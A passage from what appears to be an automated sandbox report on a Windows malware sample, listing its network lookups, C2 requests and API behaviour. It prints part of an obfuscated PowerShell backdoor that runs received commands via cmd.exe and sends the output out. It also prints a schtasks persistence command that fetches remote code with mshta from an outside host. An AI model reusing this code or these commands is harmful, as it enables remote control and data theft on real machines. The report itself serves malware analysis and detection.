32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj;
  2184
  - schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 60 /tn Office\option\update /tr "mshta http://pumpmotor.net/editor/smartoption.php" /f
    2336

Name	Response	Post-Analysis Lookup
kentwater.cn	A 43.242.131.134	43.242.131.134

IP Address	Status	Action
164.124.101.2	Active	Moloch
43.242.131.134	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 13, 2023, 9:53 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 13, 2023, 9:53 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 13, 2023, 9:53 a.m.	buffer: SUCCESS: The scheduled task "Office\option\update" has successfully been created. console_handle: 0x00000007	1	1	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002826f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282430 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002821f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00282630 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002824f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 13, 2023, 9:53 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00281bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 13, 2023, 9:53 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?z1sUfI=gi8u3&7Aq42=Gub3nUqdgYFKP8Bf&Xi7cSqs=MwwSVlM2HgkKOCgvdlwrFCIWFloBO0wWAjojIiZdZA8jSDR2OAEnIC4gCh0SfA&o43vz0Wd=DUdJK95
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?SN6vlWX5=0szj7BZlSTNRF&l9L7t85E1=P9KV5iWFmfb&9il5=AQ3BbrwCUXu1&kzwDru=rp3yzGvbSNwQ&u8dw2=8uLpU5jDOHdsrPly&D4yaJKE=TAw8FWhWBSkiKQoXVDQFC10WOBk6W1c2KisBGgQ1ShBcSBo1A2E8AAYxKCUwFA&vRdFJALhu=bLMoFCsqn
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?TlMcD0Ao=25IilUCF6y&TU1JA34g=Tyzc7puEYRS1O3Q&hregZ=UO7DwbvfTCphWZzq&Pcm50x6=ITZHIUoBGQs5Ih4McT4TAzAsQy0YDEsUMSAVASE_XBgxcmEBITYgIh06PD4VHg&IHGKOC=4UESkm
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?lIc=1FOdISaB&9P71m=NqDdzlOor3fSQpIG&qPv7KDa=Ogg0AUcPIAIfUgg3dxQgNSsSMA0VAnIdF1ADOicVby4qTBIhLDgZKztKKgUTNA
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?6v=GUrbi7L&vtfW8=sYghU7IQo21ftAXj&9eDt13B=ByAXDWhUJjwCU18CUiUxGBY6EwE6WXQjClFUDwIkfgMXZDEtA2MfFSZLfTA2BQ&Mz4s=UO2J0&g4VEDh=HjdIpfc
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?VXRu=6kLbuY1aWeJmjO&LVfau=lH0D8E1OxtUGIkJR&RA6dcsU=GDFAIQUmXiIVFTsjbw8jIAkrRC1XKww9HRcwLj8ObDsIdWYBbhFnCzENGRELLw
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?MXsl7LC8D=N7X1SoIhvZV&uFzOMrnj=M8FeRUNq1nP&qUMSj=7FeDtQP8Hk1csmZI&74bdWNa=Qz8VIUkyP1UlCl8HVQkzO1IlES0bP21KLQhUCgUIfCBTezMBIgUGfAESfTUxKQ&XKAn=WEen6
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?CAVOt6Npb=xjPDl6R&ydEJCl=MAErLBSCmOJG&4iGjK=4lSxO0qiNcfvm1H7&21Jn0lD=QBUjHXJTHgQjAggSS1UhRVEPJxEgXkwbKwADHxtUbl5QUQU9GWQnLQcaKiAvdQ&E9vtGu=ugi
suspicious_features	GET method with no useragent header	suspicious_request	GET http://kentwater.cn/caches/caches_template/user/index.php?DNhmTrg6B=RLgh7dp3c2rTt&h=wap8I5&inu2wpr5G=bKXDenjoQ&2JptK=y7gAKRvqBtib8mpu&F9umKUj=DU4XJHYxGRwvFQcGHgkZBxxUEygkPEsDJxcMC04IVhwdCjEEHQYgNQsNJTR6KQ&7=ugwN

Performs some HTTP requests (9 events)

request	GET http://kentwater.cn/caches/caches_template/user/index.php?z1sUfI=gi8u3&7Aq42=Gub3nUqdgYFKP8Bf&Xi7cSqs=MwwSVlM2HgkKOCgvdlwrFCIWFloBO0wWAjojIiZdZA8jSDR2OAEnIC4gCh0SfA&o43vz0Wd=DUdJK95
request	GET http://kentwater.cn/caches/caches_template/user/index.php?SN6vlWX5=0szj7BZlSTNRF&l9L7t85E1=P9KV5iWFmfb&9il5=AQ3BbrwCUXu1&kzwDru=rp3yzGvbSNwQ&u8dw2=8uLpU5jDOHdsrPly&D4yaJKE=TAw8FWhWBSkiKQoXVDQFC10WOBk6W1c2KisBGgQ1ShBcSBo1A2E8AAYxKCUwFA&vRdFJALhu=bLMoFCsqn
request	GET http://kentwater.cn/caches/caches_template/user/index.php?TlMcD0Ao=25IilUCF6y&TU1JA34g=Tyzc7puEYRS1O3Q&hregZ=UO7DwbvfTCphWZzq&Pcm50x6=ITZHIUoBGQs5Ih4McT4TAzAsQy0YDEsUMSAVASE_XBgxcmEBITYgIh06PD4VHg&IHGKOC=4UESkm
request	GET http://kentwater.cn/caches/caches_template/user/index.php?lIc=1FOdISaB&9P71m=NqDdzlOor3fSQpIG&qPv7KDa=Ogg0AUcPIAIfUgg3dxQgNSsSMA0VAnIdF1ADOicVby4qTBIhLDgZKztKKgUTNA
request	GET http://kentwater.cn/caches/caches_template/user/index.php?6v=GUrbi7L&vtfW8=sYghU7IQo21ftAXj&9eDt13B=ByAXDWhUJjwCU18CUiUxGBY6EwE6WXQjClFUDwIkfgMXZDEtA2MfFSZLfTA2BQ&Mz4s=UO2J0&g4VEDh=HjdIpfc
request	GET http://kentwater.cn/caches/caches_template/user/index.php?VXRu=6kLbuY1aWeJmjO&LVfau=lH0D8E1OxtUGIkJR&RA6dcsU=GDFAIQUmXiIVFTsjbw8jIAkrRC1XKww9HRcwLj8ObDsIdWYBbhFnCzENGRELLw
request	GET http://kentwater.cn/caches/caches_template/user/index.php?MXsl7LC8D=N7X1SoIhvZV&uFzOMrnj=M8FeRUNq1nP&qUMSj=7FeDtQP8Hk1csmZI&74bdWNa=Qz8VIUkyP1UlCl8HVQkzO1IlES0bP21KLQhUCgUIfCBTezMBIgUGfAESfTUxKQ&XKAn=WEen6
request	GET http://kentwater.cn/caches/caches_template/user/index.php?CAVOt6Npb=xjPDl6R&ydEJCl=MAErLBSCmOJG&4iGjK=4lSxO0qiNcfvm1H7&21Jn0lD=QBUjHXJTHgQjAggSS1UhRVEPJxEgXkwbKwADHxtUbl5QUQU9GWQnLQcaKiAvdQ&E9vtGu=ugi
request	GET http://kentwater.cn/caches/caches_template/user/index.php?DNhmTrg6B=RLgh7dp3c2rTt&h=wap8I5&inu2wpr5G=bKXDenjoQ&2JptK=y7gAKRvqBtib8mpu&F9umKUj=DU4XJHYxGRwvFQcGHgkZBxxUEygkPEsDJxcMC04IVhwdCjEEHQYgNQsNJTR6KQ&7=ugwN

Allocates read-write-execute memory (usually to unpack itself) (50 out of 172 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 3032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73162000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 3032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c73000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 3032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03f70000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d51000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0230a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d52000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02302000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02312000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02811000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0233a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02313000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02314000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0234b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02347000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0230b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02332000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02345000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02315000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0233c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02316000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0234c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02333000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02334000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02335000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02336000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02337000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02338000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02339000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05100000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05101000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05102000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 13, 2023, 9:53 a.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05103000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
